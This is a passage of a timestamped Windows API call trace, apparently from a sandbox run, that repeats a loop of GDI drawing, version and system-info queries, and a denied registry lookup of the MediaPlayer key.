[0017.575] DeleteObject (ho=0x4304027d) returned 1 [0017.575] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.575] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.575] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.575] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.575] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.575] BeginPath (hdc=0x0) returned 0 [0017.575] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.575] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.575] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.576] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.576] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.576] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.576] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.576] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.576] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4e040713 [0017.576] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4404027d [0017.576] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aa2 [0017.576] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aa3 [0017.576] CombineRgn (hrgnDst=0x1040aa2, hrgnSrc1=0x4e040713, hrgnSrc2=0x4404027d, iMode=1) returned 1 [0017.576] CombineRgn (hrgnDst=0x1040aa3, hrgnSrc1=0x4e040713, hrgnSrc2=0x4404027d, iMode=4) returned 2 [0017.576] CreateSolidBrush (color=0xff) returned 0x2100aa1 [0017.576] CreateSolidBrush (color=0xff0000) returned 0x1100aa4 [0017.576] DeleteObject (ho=0x1100aa4) returned 1 [0017.576] DeleteObject (ho=0x4404027d) returned 1 [0017.576] DeleteObject (ho=0x4e040713) returned 1 [0017.576] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.576] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.576] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.576] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.576] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.576] BeginPath (hdc=0x0) returned 0 [0017.576] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.576] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.576] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.576] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.576] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.576] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.576] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.577] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.577] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4504027d [0017.577] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4f040713 [0017.577] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aa5 [0017.577] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aa6 [0017.577] CombineRgn (hrgnDst=0x1040aa5, hrgnSrc1=0x4504027d, hrgnSrc2=0x4f040713, iMode=1) returned 1 [0017.577] CombineRgn (hrgnDst=0x1040aa6, hrgnSrc1=0x4504027d, hrgnSrc2=0x4f040713, iMode=4) returned 2 [0017.577] CreateSolidBrush (color=0xff) returned 0x2100aa4 [0017.577] CreateSolidBrush (color=0xff0000) returned 0x1100aa7 [0017.577] DeleteObject (ho=0x1100aa7) returned 1 [0017.577] DeleteObject (ho=0x4f040713) returned 1 [0017.577] DeleteObject (ho=0x4504027d) returned 1 [0017.577] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.577] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.577] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.577] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.577] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.577] BeginPath (hdc=0x0) returned 0 [0017.577] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.577] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.577] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.577] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.577] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.577] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.577] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.577] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.578] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x50040713 [0017.578] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4604027d [0017.578] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aa8 [0017.578] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aa9 [0017.578] CombineRgn (hrgnDst=0x1040aa8, hrgnSrc1=0x50040713, hrgnSrc2=0x4604027d, iMode=1) returned 1 [0017.578] CombineRgn (hrgnDst=0x1040aa9, hrgnSrc1=0x50040713, hrgnSrc2=0x4604027d, iMode=4) returned 2 [0017.578] CreateSolidBrush (color=0xff) returned 0x2100aa7 [0017.578] CreateSolidBrush (color=0xff0000) returned 0x1100aaa [0017.578] DeleteObject (ho=0x1100aaa) returned 1 [0017.578] DeleteObject (ho=0x4604027d) returned 1 [0017.578] DeleteObject (ho=0x50040713) returned 1 [0017.578] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.578] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.578] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.578] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.578] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.578] BeginPath (hdc=0x0) returned 0 [0017.578] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.578] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.578] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.578] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.578] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.578] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.578] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.578] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.579] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4704027d [0017.579] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x51040713 [0017.579] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aab [0017.579] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aac [0017.579] CombineRgn (hrgnDst=0x1040aab, hrgnSrc1=0x4704027d, hrgnSrc2=0x51040713, iMode=1) returned 1 [0017.579] CombineRgn (hrgnDst=0x1040aac, hrgnSrc1=0x4704027d, hrgnSrc2=0x51040713, iMode=4) returned 2 [0017.579] CreateSolidBrush (color=0xff) returned 0x2100aaa [0017.579] CreateSolidBrush (color=0xff0000) returned 0x1100aad [0017.579] DeleteObject (ho=0x1100aad) returned 1 [0017.579] DeleteObject (ho=0x51040713) returned 1 [0017.579] DeleteObject (ho=0x4704027d) returned 1 [0017.579] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.579] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.579] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.579] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.579] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.579] BeginPath (hdc=0x0) returned 0 [0017.579] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.579] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.579] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.579] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.579] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.579] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.579] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.579] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.579] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x52040713 [0017.579] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4804027d [0017.579] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aae [0017.579] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aaf [0017.580] CombineRgn (hrgnDst=0x1040aae, hrgnSrc1=0x52040713, hrgnSrc2=0x4804027d, iMode=1) returned 1 [0017.580] CombineRgn (hrgnDst=0x1040aaf, hrgnSrc1=0x52040713, hrgnSrc2=0x4804027d, iMode=4) returned 2 [0017.580] CreateSolidBrush (color=0xff) returned 0x2100aad [0017.580] CreateSolidBrush (color=0xff0000) returned 0x1100ab0 [0017.580] DeleteObject (ho=0x1100ab0) returned 1 [0017.580] DeleteObject (ho=0x4804027d) returned 1 [0017.580] DeleteObject (ho=0x52040713) returned 1 [0017.580] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.580] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.580] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.580] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.580] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.580] BeginPath (hdc=0x0) returned 0 [0017.580] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.580] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.580] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.580] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.580] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.580] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.580] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.580] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.580] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4904027d [0017.580] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x53040713 [0017.580] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ab1 [0017.580] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ab2 [0017.580] CombineRgn (hrgnDst=0x1040ab1, hrgnSrc1=0x4904027d, hrgnSrc2=0x53040713, iMode=1) returned 1 [0017.580] CombineRgn (hrgnDst=0x1040ab2, hrgnSrc1=0x4904027d, hrgnSrc2=0x53040713, iMode=4) returned 2 [0017.580] CreateSolidBrush (color=0xff) returned 0x2100ab0 [0017.580] CreateSolidBrush (color=0xff0000) returned 0x1100ab3 [0017.580] DeleteObject (ho=0x1100ab3) returned 1 [0017.580] DeleteObject (ho=0x53040713) returned 1 [0017.580] DeleteObject (ho=0x4904027d) returned 1 [0017.580] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.581] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.581] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.581] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.581] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.581] BeginPath (hdc=0x0) returned 0 [0017.581] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.581] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.581] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.581] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.581] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.581] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.581] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.581] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.581] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x54040713 [0017.581] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4a04027d [0017.581] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ab4 [0017.581] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ab5 [0017.581] CombineRgn (hrgnDst=0x1040ab4, hrgnSrc1=0x54040713, hrgnSrc2=0x4a04027d, iMode=1) returned 1 [0017.581] CombineRgn (hrgnDst=0x1040ab5, hrgnSrc1=0x54040713, hrgnSrc2=0x4a04027d, iMode=4) returned 2 [0017.581] CreateSolidBrush (color=0xff) returned 0x2100ab3 [0017.581] CreateSolidBrush (color=0xff0000) returned 0x1100ab6 [0017.581] DeleteObject (ho=0x1100ab6) returned 1 [0017.581] DeleteObject (ho=0x4a04027d) returned 1 [0017.581] DeleteObject (ho=0x54040713) returned 1 [0017.581] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.581] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.581] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.581] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.581] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.582] BeginPath (hdc=0x0) returned 0 [0017.582] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.582] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.582] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.582] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.582] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.582] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.582] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.582] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.582] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4b04027d [0017.582] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x55040713 [0017.582] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ab7 [0017.582] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ab8 [0017.582] CombineRgn (hrgnDst=0x1040ab7, hrgnSrc1=0x4b04027d, hrgnSrc2=0x55040713, iMode=1) returned 1 [0017.582] CombineRgn (hrgnDst=0x1040ab8, hrgnSrc1=0x4b04027d, hrgnSrc2=0x55040713, iMode=4) returned 2 [0017.582] CreateSolidBrush (color=0xff) returned 0x2100ab6 [0017.582] CreateSolidBrush (color=0xff0000) returned 0x1100ab9 [0017.582] DeleteObject (ho=0x1100ab9) returned 1 [0017.582] DeleteObject (ho=0x55040713) returned 1 [0017.582] DeleteObject (ho=0x4b04027d) returned 1 [0017.582] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.582] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.582] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.582] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.582] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.582] BeginPath (hdc=0x0) returned 0 [0017.582] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.582] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.582] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.582] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.582] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.583] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.583] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.583] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.583] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x56040713 [0017.583] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4c04027d [0017.583] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aba [0017.583] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040abb [0017.583] CombineRgn (hrgnDst=0x1040aba, hrgnSrc1=0x56040713, hrgnSrc2=0x4c04027d, iMode=1) returned 1 [0017.583] CombineRgn (hrgnDst=0x1040abb, hrgnSrc1=0x56040713, hrgnSrc2=0x4c04027d, iMode=4) returned 2 [0017.583] CreateSolidBrush (color=0xff) returned 0x2100ab9 [0017.583] CreateSolidBrush (color=0xff0000) returned 0x1100abc [0017.583] DeleteObject (ho=0x1100abc) returned 1 [0017.583] DeleteObject (ho=0x4c04027d) returned 1 [0017.583] DeleteObject (ho=0x56040713) returned 1 [0017.583] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.583] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.583] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.583] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.583] SetDCPenColor (hdc=0x0, color=0x0) 